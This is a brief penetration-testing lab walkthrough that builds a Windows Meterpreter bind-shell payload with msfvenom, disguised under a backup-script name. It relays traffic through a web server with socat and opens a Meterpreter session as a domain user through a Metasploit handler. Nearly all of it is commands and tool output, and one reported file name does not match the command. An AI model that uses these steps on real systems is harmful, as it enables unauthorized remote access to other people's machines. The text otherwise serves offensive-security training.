Bind Shell

We can create a bind shell payload for Windows and execute it on the Windows host.

Creating the Windows Payload

neutron@kali[/kali]$ msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 499 bytes
Final size of exe file: 7168 bytes
Saved as: backupjob.exe

socat bind shell

ubuntu@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:

Configuring & Starting the Bind multi/handler

msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set RHOST
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against

Establishing Meterpreter Session

[*] Sending stage (200262 bytes) to
[*] Meterpreter session 1 opened ( -> ) at 2022-03-07 12:44:44 -0500

meterpreter > getuid
Server username: LEGALCORP\victor